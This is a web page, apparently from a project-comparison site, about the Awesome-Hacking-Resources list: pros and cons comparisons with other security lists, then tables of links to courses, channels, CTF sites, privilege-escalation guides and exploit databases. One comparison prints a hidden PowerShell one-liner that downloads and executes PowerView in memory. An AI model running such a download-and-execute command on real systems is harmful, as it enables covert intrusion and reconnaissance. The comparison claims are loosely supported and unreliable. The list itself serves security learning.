Convert Figma logo to code with AI

vitalysim logoAwesome-Hacking-Resources

A collection of hacking / penetration testing resources to make you better!

15,260
2,106
15,260
21

Top Related Projects

A list of Free Software network services and web applications which can be hosted on your own servers

A collection of awesome penetration testing resources, tools and other shiny things

A collection of awesome software, libraries, documents, books, resources and cools stuffs about security.

A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more.

A collection of various awesome lists for hackers, pentesters and security researchers

This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.

Quick Overview

Awesome-Hacking-Resources is a curated list of hacking tools, resources, and references for cybersecurity enthusiasts and professionals. It serves as a comprehensive collection of links to various hacking-related topics, including penetration testing, reverse engineering, cryptography, and more.

Pros

  • Extensive collection of resources covering a wide range of cybersecurity topics
  • Regularly updated with new and relevant content
  • Well-organized structure makes it easy to find specific resources
  • Community-driven project with contributions from multiple experts in the field

Cons

  • May be overwhelming for beginners due to the vast amount of information
  • Some links may become outdated over time
  • Lacks detailed explanations or tutorials for using the listed tools
  • Potential for misuse if not used responsibly and ethically

Note: As this is not a code library, the code example and quick start sections have been omitted.

Competitor Comparisons

A list of Free Software network services and web applications which can be hosted on your own servers

Pros of awesome-selfhosted

  • More comprehensive and diverse list of self-hosted software across various categories
  • Regularly updated with new entries and maintained by a larger community
  • Includes detailed information about each project, such as programming language and license

Cons of awesome-selfhosted

  • Less focused on security and hacking-specific tools
  • May be overwhelming for users looking specifically for hacking resources
  • Requires more time to navigate and find relevant tools for security purposes

Code comparison

While both repositories are primarily curated lists, awesome-selfhosted includes a more structured format for entries:

- [Project Name](https://example.com) - Brief description. (`License` `Language`)

Awesome-Hacking-Resources uses a simpler format:

- [Resource Name](https://example.com)

The structured format in awesome-selfhosted provides more information at a glance but may be less concise for quick browsing.

Both repositories use Markdown for organization, with awesome-selfhosted having a more complex structure due to its broader scope and categorization.

A collection of awesome penetration testing resources, tools and other shiny things

Pros of awesome-pentest

  • More comprehensive and regularly updated with a wider range of penetration testing resources
  • Better organized into clear categories, making it easier to find specific tools or information
  • Includes more practical resources like vulnerable applications and CTF platforms

Cons of awesome-pentest

  • May be overwhelming for beginners due to the sheer volume of information
  • Less focus on educational resources and learning paths compared to Awesome-Hacking-Resources

Code comparison

While both repositories are primarily curated lists of resources, they don't contain significant code samples. However, they do use different formatting styles in their README files:

awesome-pentest:

## Tools
### Penetration Testing Distributions
* [Kali](https://www.kali.org/) - Rolling release based on Debian Testing.

Awesome-Hacking-Resources:

### Reverse Engineering Tools
* [IDA Pro](https://www.hex-rays.com/products/ida/) - Proprietary multi-processor disassembler and debugger

Both repositories use similar Markdown formatting, but awesome-pentest tends to use more nested categories and subcategories, while Awesome-Hacking-Resources generally keeps a flatter structure.

A collection of awesome software, libraries, documents, books, resources and cools stuffs about security.

Pros of awesome-security

  • More comprehensive coverage of security topics, including network security, web security, and cryptography
  • Better organization with clear categories and subcategories
  • Includes tools, frameworks, and resources for both offensive and defensive security

Cons of awesome-security

  • Less focus on specific hacking techniques and methodologies
  • Fewer resources for beginners looking to start in ethical hacking
  • May be overwhelming for those seeking a curated list of hacking-specific resources

Code comparison

While both repositories are primarily curated lists of resources, they don't contain significant code samples. However, here's an example of how they structure their markdown:

awesome-security:

## Network

### Scanning / Pentesting

* [nmap](https://nmap.org/) - Free Security Scanner For Network Exploration & Security Audits

Awesome-Hacking-Resources:

### Reverse Engineering Tools
* [IDA Pro](https://www.hex-rays.com/products/ida/) - Proprietary multi-processor disassembler and debugger

Both repositories use similar markdown structures, but awesome-security tends to have more nested categories and subcategories, while Awesome-Hacking-Resources often uses a flatter structure with more specific top-level categories.

A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more.

Pros of the-book-of-secret-knowledge

  • Broader scope, covering various IT topics beyond just hacking
  • More structured organization with clear categories
  • Includes practical CLI commands and code snippets

Cons of the-book-of-secret-knowledge

  • Less focused on specific hacking techniques and tools
  • May be overwhelming for beginners due to its extensive content
  • Updates less frequently compared to Awesome-Hacking-Resources

Code Comparison

While both repositories primarily consist of curated lists, the-book-of-secret-knowledge includes more practical code snippets and commands. For example:

the-book-of-secret-knowledge:

# Get information about the CPU
lscpu

# Monitor system resources in real-time
top

Awesome-Hacking-Resources typically provides links to tools and resources without direct code examples:

- [Nmap](https://nmap.org/) - Free security scanner for network exploration
- [Wireshark](https://www.wireshark.org/) - Network protocol analyzer

Both repositories serve as valuable resources for IT professionals and security enthusiasts, but they cater to slightly different needs. the-book-of-secret-knowledge offers a broader range of IT knowledge, while Awesome-Hacking-Resources focuses more specifically on hacking and cybersecurity tools and techniques.

A collection of various awesome lists for hackers, pentesters and security researchers

Pros of Awesome-Hacking

  • More comprehensive and regularly updated, with a larger number of resources
  • Better organized with clear categories and subcategories
  • Includes a wider range of topics, including mobile hacking and IoT security

Cons of Awesome-Hacking

  • Can be overwhelming due to the sheer volume of information
  • Less focus on beginner-friendly resources
  • Some links may be outdated or no longer maintained

Code Comparison

While both repositories primarily consist of curated lists rather than code, Awesome-Hacking includes some basic HTML for improved readability:

Awesome-Hacking:

<h3>Table of Contents</h3>
<ul>
    <li><a href="#Awesome-Hacking-Resources">Awesome Hacking Resources</a></li>
    <li><a href="#Table-of-Contents">Table of Contents</a></li>
    <li><a href="#Introduction">Introduction</a></li>
    ...
</ul>

Awesome-Hacking-Resources:

# Awesome Hacking Resources

A collection of hacking / penetration testing resources to make you better!

## Table of Contents
 * [Learning the Skills](#learning-the-skills)
 * [YouTube Channels](#youtube-channels)
 * [Sharpening Your Skills](#sharpening-your-skills)
 ...

Both repositories use Markdown for the majority of their content, but Awesome-Hacking incorporates some HTML for improved structure and navigation.

This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.

Pros of Red-Teaming-Toolkit

  • More focused on specific red teaming tools and techniques
  • Includes sections on cloud security and containerization
  • Provides a curated list of tools for each category

Cons of Red-Teaming-Toolkit

  • Less comprehensive in general hacking resources
  • Fewer learning resources and tutorials
  • Not as frequently updated as Awesome-Hacking-Resources

Code Comparison

While both repositories primarily consist of markdown files with lists of resources, Red-Teaming-Toolkit includes some code snippets for specific tools. For example:

Red-Teaming-Toolkit:

powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')

Awesome-Hacking-Resources doesn't typically include code snippets, focusing instead on categorized lists of resources.

Both repositories are valuable for security professionals, but they serve slightly different purposes. Awesome-Hacking-Resources is more comprehensive and beginner-friendly, covering a wide range of hacking topics. Red-Teaming-Toolkit is more specialized, focusing on tools and techniques specifically for red team operations. The choice between them depends on the user's specific needs and level of expertise in the field.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README


awesome

Awesome Hacking Resources Awesome Hacking Awesome community

A collection of hacking / penetration testing resources to make you better!

Let's make it the biggest resource repository for our community.

You are welcome to fork and contribute.

We started a new tools list, come and contribute

Table of Contents

Learning the Skills

NameDescription
CS 642: Intro to Computer Securityacademic content, full semester course, includes assigned readings, homework and github refs for exploit examples. NO VIDEO LECTURES.
CyberSec WTFCyberSec WTF Web Hacking Challenges from Bounty write-ups
Cybrarycoursera style website, lots of user-contributed content, account required, content can be filtered by experience level
Free Cyber Security TrainingAcademic content, 8 full courses with videos from a quirky instructor sam, links to research, defcon materials and other recommended training/learning
Hak5podcast-style videos covering various topics, has a forum, "metasploit-minute" video series could be useful
Hopper's Roppers Security TrainingFour free self-paced courses on Computing Fundamentals, Security, Capture the Flags, and a Practical Skills Bootcamp that help beginners build a strong base of foundational knowledge. Designed to prepare for students for whatever they need to learn next.
Learning Exploitation with Offensive Computer Security 2.0blog-style instruction, includes: slides, videos, homework, discussion. No login required.
Mind MapsInformation Security related Mind Maps
MIT OCW 6.858 Computer Systems Securityacademic content, well organized, full-semester course, includes assigned readings, lectures, videos, required lab files.
OffensiveComputerSecurityacademic content, full semester course including 27 lecture videos with slides and assign readings
OWASP top 10 web security risksfree courseware, requires account
SecurityTubetube-styled content, "megaprimer" videos covering various topics, no readable content on site.
Seed Labsacademic content, well organized, featuring lab videos, tasks, needed code files, and recommended readings
TryHackMeDesigned prebuilt challenges which include virtual machines (VM) hosted in the cloud ready to be deployed

YouTube Channels

NameDescription
0patch by ACROS Securityfew videos, very short, specific to 0patch
BlackHatfeatures talks from the BlackHat conferences around the world
Christiaan008hosts a variety of videos on various security topics, disorganized
Companies
Detectifyvery short videos, aimed at showing how to use Detictify scanner
Hak5see Hak5 above
Kaspersky Lablots of Kaspersky promos, some hidden cybersecurity gems
Metasploitcollection of medium length metasploit demos, ~25minutes each, instructional
ntopnetwork monitoring, packet analysis, instructional
nVisiumSome nVisum promos, a handful of instructional series on Rails vulns and web hacking
OpenNSMnetwork analysis, lots of TCPDUMP videos, instructional,
OWASPsee OWASP above
Rapid7brief videos, promotional/instructional, ~ 5 minutes
Securelistbrief videos, interviews discussing various cyber security topics
Segment Securitypromo videos, non-instructional
SocialEngineerOrgpodcast-style, instructional, lengthy content ~1 hr each
Sonatypelots of random videos, a good cluster of DevOps related content, large range of lengths, disorganized
SophosLabslots of brief, news-style content, "7 Deadly IT Sins" segment is of note
Sourcefirelots of brief videos covering topics like botnets, DDoS ~5 minutes each
Station Xhandful of brief videos, disorganized, unscheduled content updates
Synackrandom, news-style videos, disorganized, non-instructional
TippingPoint Zero Day Initiativevery brief videos ~30 sec, somewhat instructional
Tripwire, Inc.some tripwire demos, and random news-style videos, non-instructional
Vincent Yiuhandful of videos from a single hacker, instructional
Conferences
44contvin
MIT OCW 6.858 Computer Systems SecurityInformation security con based in London, lengthy instructional videos
BruCON Security Conferencesecurity and hacker conference based in b\Belgium, lots of lengthy instructinoal videos
BSides Manchestersecurity and hacker con based in Mancheseter, lots of lengthy videos
BSidesAugustasecurity con based in Augusta, Georgia, lots of lengthy instructional videos
CarolinaConsecurity con based in North Carolina, associated with various 2600 chapters, lots of lengthy instructional content
Cort Johnsona handful of lengthy con-style talks from Hack Secure Opensec 2017
DevSecConlenghty con videos covering DevSecOps, making software more secure
Garage4Hackers - Information Securitya handful of lengthy videos, About section lacks description
HACKADAYlots of random tech content, not strictly infosec, some instructional
Hack In The Box Security Conferencelengthy con-style instructional talks from an international security con
Hack in Parissecurity con based in paris, features lots of instructional talks, slides can be difficult to see.
Hacklulots of lengthy con-style instructional videos
Hacktivitylots of lengthy con-style instructional videos from a con in central/eastern europe
Hardwear.iohandful of lengthy con-style video, emphasis on hardware hacks
IEEE Symposium on Security and Privacycontent from the symposium; IEEE is a professional association based in the us, they also publish various journals
LASCONlengthy con-style talks from an OWASP con held in Austin, TX
leHACKleHACK is the oldest ( 2003 ), leading, security conference in Paris, FR
Marcus Niemietzlots of instructional content, associated with HACKPRA, an offensive security course from an institute in Germany
Media.ccc.deThe real official channel of the chaos computer club, operated by the CCC VOC - tons of lengthy con-style vids
NorthSeclengthy con-style talks from an applied security conference in Canada
Pancake Nopcodechannel of Radare2 whiz Sergi "pancake" Alvarez, Reverse Engineering Content
Psiinonmedium length instructional videos, for the OWASP Zed Attack Proxy
SJSU Infosechandful of lengthy instructional videos from San Jose State university Infosec
Secappdev.orgtons of lengthy instructional lectures on Secure App Development
Security Festmedium length con-style talks from a security festival in Sweden
SecurityTubeConsan assortment of con-style talks from various cons including BlackHat and Shmoocon
ToorConhandful of medium length con videos from con based in San Diego, CA
USENIX Enigma Conferencemedium length "round table discussion with leading experts", content starts in 2016
ZeroNightsa lot of con-style talks from international conference ZeroNights
News
0x41414141Channel with couple challenges, well explained
Adrian Crenshawlots of lengthy con-style talks
Corey Nachreinersecurity newsbites, 2.7K subscribers, 2-3 videos a week, no set schedule
BalCCon - Balkan Computer CongressLong con-style talks from the Balkan Computer Congress, doesn't update regularly
danooct1lots of brief screenshot, how-to vids regarding malware, regular content updates, 186K followerss
DedSeclots of brief screenshot how-to vids based in Kali, no recent posts.
DEFCON Conferencelots of lengthy con-style vids from the iconical DEFCON
DemmSeclots of pen testing vids, somewhat irregular uploads, 44K followers
Derek Rook - CTF/Boot2root/wargames Walkthroughlots of lengthy screenshot instructional vids, with
Don Does 30amateur pen-tester posting lots of brief screenshot vids regularly, 9K Followers
Error 404 Cyber Newsshort screen-shot videos with loud metal, no dialog, bi-weekly
Geeks Fort - KIFlots of brief screenshot vids, no recent posts
GynvaelENSecurity streams from Google Researcher. Mainly about CTFs, computer security, programing and similar things.
HackerSploitregular posts, medium length screenshot vids, with dialog
HACKING TUTORIALShandful of brief screenshot vids, no recent posts.
iExplo1tlots of screenshot vids aimed at novices, 5.7K Followers, no recent posts
JackkTutorialslots of medium length instructional vids with some AskMe vids from the youtuber
John HammondSolves CTF problems. contains penTesting tips and tricks
Latest Hacking News10K followers, medium length screenshot videos, no recent releases
LionSeclots of brief screenshot instructional vids, no dialog
LiveOverflowLots of brief-to-medium instructional vids, covering things like buffer overflows and exploit writing, regular posts.
Metasploitationlots of screenshot vids, little to no dialogue, all about using Metasploit, no recent vids.
NetSecNowchannel of pentesteruniversity.org, seems to post once a month, screenshot instructional vids
Open SecurityTraininglots of lengthy lecture-style vids, no recent posts, but quality info.
Pentester Academy TVlots of brief videos, very regular posting, up to +8 a week
Penetration Testing in LinuxDELETE
rwbnetseclots of medium length instructional videos covering tools from Kali 2.0, no recent posts.
Samy Kamkar's Applied Hackingbrief to medium length instructional vids from the creator of PoisonTap for the Raspberry Pi Zero, no recent content, last updated in 2016
SecureNinjaTVbrief news bites, irregular posting, 18K followers
Security Weeklyregular updates, lengthy podcast-style interviews with industry pros
Seytonicvariety of DIY hacking tutorials, hardware hacks, regular updates
Shozab Haxorlots of screenshot style instructional vids, regular updates, windows CLI tutorial
SSTec Tutorialslots of brief screenshot vids, regular updates
Tradecraft Security WeeklyWant to learn about all of the latest security tools and techniques?
Troy Huntlone youtuber, medium length news videos, 16K followers, regular content
Waleed Juttlots of brief screenshot vids covering web security and game programming
webpwnizedlots of brief screenshot vids, some CTF walkthroughs
Zer0Mem0rylots of brief c++ security videos, programming intensive
LionSeclots of brief screenshot instructional vids, no dialog
Adrian Crenshawlots of lengthy con-style talks
HackerSploitregular posts, medium length screenshot vids, with dialog
Derek Rook - CTF/Boot2root/wargames Walkthroughlots of lengthy screenshot instructional vids, with
Tradecraft Security WeeklyWant to learn about all of the latest security tools and techniques?
IPPSecHackthebox.eu retired machine vulnerable machine walkthroughs to help you learn both basic and advanced processes and techniques
The Daily SwigLatest Cybersecurity News

Sharpening Your Skills

NameDescription
Backdoorpen testing labs that have a space for beginners, a practice arena and various competitions, account required
The cryptopals crypto challengesA bunch of CTF challenges, all focused on cryptography.
Challenge LandCtf site with a twist, no simple sign-up, you have to solve a challengeto even get that far!
Crackmes.de Archive (2011-2015)a reverse engineering information Repo, started in 2003
Crackmes.oneThis is a simple place where you can download crackmes to improve your reverse engineering skills.
CTFLearnan account-based ctf site, where users can go in and solve a range of challenges
CTFs write-upsa collection of writeups from various CTFs, organized by
CTF365account based ctf site, awarded by Kaspersky, MIT, T-Mobile
The enigma groupweb application security training, account based, video tutorials
Exploit exerciseshosts 5 fulnerable virtual machines for you to attack, no account required
Google CTFSource code of Google 2017, 2018 and 2019 CTF
Google CTF 20192019 edition of the Google CTF contest
Google's XSS gameXSS challenges, and potentially a chance to get paid!
Hack The BoxPen testing labs hosting over 39 vulnerable machines with two additional added every month
Hacker testsimilar to "hackthissite", no account required.
Hacker Gatewayctfs covering steganography, cryptography, and web challengs, account required
Hacksplaininga clickthrough security informational site, very good for beginners.
hackburger.eehosts a number of web hacking challenges, account required
Hack.melets you build/host/attack vulnerable web apps
Hack this site!an oldy but goodie, account required, users start at low levels and progress in difficulty
knock.xss.moeXSS challenges, account required.
Lin.securityPractice your Linux privilege escalation
noe.systemsKorean challenge site, requires an account
Over the wireA CTF that's based on progressive levels for each lab, the users SSH in, no account recquired
Participating Challenge Sitesaims at creating a universal ranking for CTF participants
PentesterLabhosts a variety of exercises as well as various "bootcamps" focused on specific activities
Pentestitacocunt based CTF site, users have to install open VPN and get credentials
Pentest Practiceaccount based Pentest practice, free to sign up, but there's also a pay-as-you-go feature
Pentest.traininglots of various labs/VMS for you to try and hack, registry is optional.
PicoCTFCTF hosted by Carnegie Mellon, occurs yearly, account required.
pwnable.krDon't let the cartoon characters fool you, this is a serious CTF site that will teach you a lot, account required
pwnable.twhosts 27 challenges accompanied with writeups, account required
Ringzer0 Teaman account based CTF site, hosting over 272 challenges
ROP EmporiumReturn Oriented Programming challenges
SmashTheStackhosts various challenges, similar to OverTheWire, users must SSH into the machines and progress in levels
Shellter Labsaccount based infosec labs, they aim at making these activities social
Solve Me"yet another challenge", account required.
Vulnhubsite hosts a ton of different vulnerable Virtual Machine images, download and get hacking
websec.frFocused on web challenges, registration is optional.
tryhackmeAwesome platform to start learning cybersecurity, account is needed
webhacking.krlots of web security challenges are available, recommended for beginners. You need to solve a simple challenge to sign up.
Stereotyped ChallengesChallenges for web security professionals, account required.
Stripe CTF 2.0Past security contest where you can discover and exploit vulnerabilities in mock web applications.
Windows / Linux Local Privilege Escalation WorkshopPractice your Linux and Windows privilege escalation
Hacking ArticlesCTF Brief Write up collection with a lot of screenshots good for begginers
Hacker101 CTFCTF hosted by HackerOne, always online. You will receive invitations to some private programs on HackerOne platform as a reward.
Hacking LabEuropean platform hosting lots of riddles, challenges and competitions
PortswiggerBest Platform inorder to learn Web Pentesting, account required

Reverse Engineering, Buffer Overflow and Exploit Development

NameDescription
A Course on Intermediate Level Linux Exploitationas the title says, this course isn't for beginners
Analysis and exploitation (unprivileged)huge collection of RE information, organized by type.
Binary hacking35 "no bullshit" binary videos along with other info
Buffer Overflow Exploitation Megaprimer for LinuxCollection of Linux Rev. Engineering videos
Corelan tutorialsdetailed tutorial, lots of good information about memory
Exploit tutorialsa series of 9 exploit tutorials,also features a podcast
Exploit developmentlinks to the forum's exploit dev posts, quality and post style will vary with each poster
flAWS challengeThrough a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS).
Introduction to ARM Assembly Basicstons of tutorials from infosec pro Azeria, follow her on twitter
Introductory Intel x8663 days of OS class materials, 29 classes, 24 instructors, no account required
Lena's Reversing for Newbies (Complete)listing of a lengthy resource by Lena, aimed at being a course
Linux (x86) Exploit Development Seriesblog post by sploitfun, has 3 different levels
Megabeets journey into Radare2one user's radare2 tutorials
Modern Binary Exploitation - CSCI 4968RE challenges, you can download the files or download the VM created by RPISEC specifically for challenges, also links to their home page with tons of infosec lectures
Recon.cx - reversing conferencethe conference site contains recordings and slides of all talks!!
Reverse Engineering for Beginnershuge textbook, created by Dennis Yurichev, open-source
Reverse engineering reading lista github collection of RE tools and books
Reverse Engineering challengescollection of challenges from the writer of RE for Beginners
Reverse Engineering for beginners (GitHub project)github for the above
Reverse Engineering Malware 101intro course created by Malware Unicorn, complete with material and two VM's
Reverse Engineering Malware 102the sequel to RE101
reversing.kr challengesreverse engineering challenges varying in difficulty
Shell stormBlog style collection with organized info about Rev. Engineering.
Shellcode Injectiona blog entry from a grad student at SDS Labs
Micro Corruption — AssemblyCTF designed to learn Assembly by practicing

Privilege Escalation

NameDescription
4 Ways get linux privilege escalationshows different examples of PE
A GUIDE TO LINUX PRIVILEGE ESCALATIONBasics of Linux privilege escalation
Abusing SUDO (Linux Privilege Escalation)Abusing SUDO (Linux Privilege Escalation)
AutoLocalPrivilegeEscalationautomated scripts that downloads and compiles from exploitdb
Basic linux privilege escalationbasic linux exploitation, also covers Windows
Common Windows Privilege Escalation VectorsCommon Windows Privilege Escalation Vectors
Editing /etc/passwd File for Privilege EscalationEditing /etc/passwd File for Privilege Escalation
Linux Privilege Escalation Linux Privilege Escalation – Tradecraft Security Weekly (Video)
Linux Privilege Escalation Check Scripta simple linux PE check script
Linux Privilege Escalation Scriptsa list of PE checking scripts, some may have already been covered
Linux Privilege Escalation Using PATH VariableLinux Privilege Escalation Using PATH Variable
Linux Privilege Escalation using Misconfigured NFSLinux Privilege Escalation using Misconfigured NFS
Linux Privilege Escalation via Dynamically Linked Shared Object LibraryHow RPATH and Weak File Permissions can lead to a system compromise.
Local Linux Enumeration & Privilege Escalation Cheatsheetgood resources that could be compiled into a script
OSCP - Windows Priviledge EscalationCommon Windows Priviledge Escalation
Privilege escalation for Windows and Linuxcovers a couple different exploits for Windows and Linux
Privilege escalation linux with live examplecovers a couple common PE methods in linux
Reach the rootdiscusses a process for linux privilege exploitation
RootHelpera tool that runs various enumeration scripts to check for privilege escalation
Unix privesc checkera script that checks for PE vulnerabilities on a system
Windows exploits, mostly precompiled.precompiled windows exploits, could be useful for reverse engineering too
Windows Privilege Escalationcollection of wiki pages covering Windows Privilege escalation
Windows Privilege EscalationNotes on Windows Privilege Escalation
Windows privilege escalation checkera list of topics that link to pentestlab.blog, all related to windows privilege escalation
Windows Privilege Escalation Fundamentalscollection of great info/tutorials, option to contribute to the creator through patreon, creator is an OSCP
Windows Privilege Escalation GuideWindows Privilege Escalation Guide
Windows Privilege Escalation Methods for PentestersWindows Privilege Escalation Methods for Pentesters

Malware Analysis

NameDescription
Malware traffic analysislist of traffic analysis exercises
Malware Analysis - CSCI 4976another class from the folks at RPISEC, quality content
[Bad Binaries] (https://www.badbinaries.com/)walkthrough documents of malware traffic analysis exercises and some occasional malware analysis.

Network Scanning / Reconnaissance

NameDescription
Foot Printing with WhoIS/DNS recordsa white paper from SANS
Google Dorks/Google Hackinglist of commands for google hacks, unleash the power of the world's biggest search engine

Vulnerable Web Application

NameDescription
bWAPPcommon buggy web app for hacking, great for beginners, lots of documentation
Damn Small Vulnerable Webwritten in less than 100 lines of code, this web app has tons of vulns, great for teaching
Damn Vulnerable Web Application (DVWA)PHP/MySQL web app for testing skills and tools
Google Gruyerehost of challenges on this cheesy web app
OWASP Broken Web Applications Projecthosts a collection of broken web apps
OWASP Hackademic Challenges projectweb hacking challenges
OWASP Mutillidae IIanother OWASP vulnerable app, lots of documentation.
OWASP Juice Shopcovers the OWASP top 10 vulns
WebGoat: A deliberately insecure Web Applicationmaintained by OWASP and designed to to teach web app security

Vulnerable OS

NameDescription
General Test Environment Guidancewhite paper from the pros at rapid7
Metasploitable2 (Linux)vulnerable OS, great for practicing hacking
Metasploitable3 [Installation]the third installation of this vulnerable OS
Vulnhubcollection of tons of different vulnerable OS and challenges

Linux Penetration Testing OS

NameDescription
Android TamerAndroid Tamer is a Virtual / Live Platform for Android Security professionals.
BackBoxopen source community project, promoting security in IT enivornments
BlackArchArch Linux based pentesting distro, compatible with Arch installs
Bugtraqadvanced GNU Linux pen-testing technology
Docker for pentestImage with the more used tools to create a pentest environment easily and quickly.
Kalithe infamous pentesting distro from the folks at Offensive Security
LionSec Linuxpentesting OS based on Ubuntu
Parrot Debian includes full portable lab for security, DFIR, and development
Pentoopentesting OS based on Gentoo

Exploits

NameDescription
0day.todayEasy to navigate database of exploits
Exploit Databasedatabase of a wide variety exploits, CVE compliant archive
CXsecurityIndie cybersecurity info managed by 1 person
Snyk Vulnerability DBdetailed info and remediation guidance for known vulns, also allows you to test your code

Forums

NameDescription
0x00sechacker, malware, computer engineering, Reverse engineering
Antichatrussian based forum
CODEBY.NEThacker, WAPT, malware, computer engineering, Reverse engineering, forensics - russian based forum
EAST Exploit databaseexploit DB for commercial exploits written for EAST Pentest Framework
Greysechacking and security forum
Hackforumsposting webstite for hacks/exploits/various discussion
4Hat Daybrazilian based hacker forum
CaveiraTechbrazilian based, general hacker forum

Archived Security Conference Videos

NameDescription
InfoCon.orghosts data from hundreds of cons
IrongeekWebsite of Adrien Crenshaw, hosts a ton of info.
infocondb.orga site that aims to catalog and cross-reference all hacker conferences.

Online Communities

NameDescription
Hacktodayrequires an account, covering all kinds of hacking topics
Hack+link requires telegram to be used
MPGHcommunity of MultiPlayerGameHacking

Online News Sources

NameDescription
InfoSeccovers all the latest infosec topics
Recent Hash Leaksgreat place to lookup hashes
Security Intellcovers all kinds of news, great intelligence resources
Threatpostcovers all the latest threats and breaches
Secjuice
The Hacker Newsfeatures a daily stream of hack news, also has an app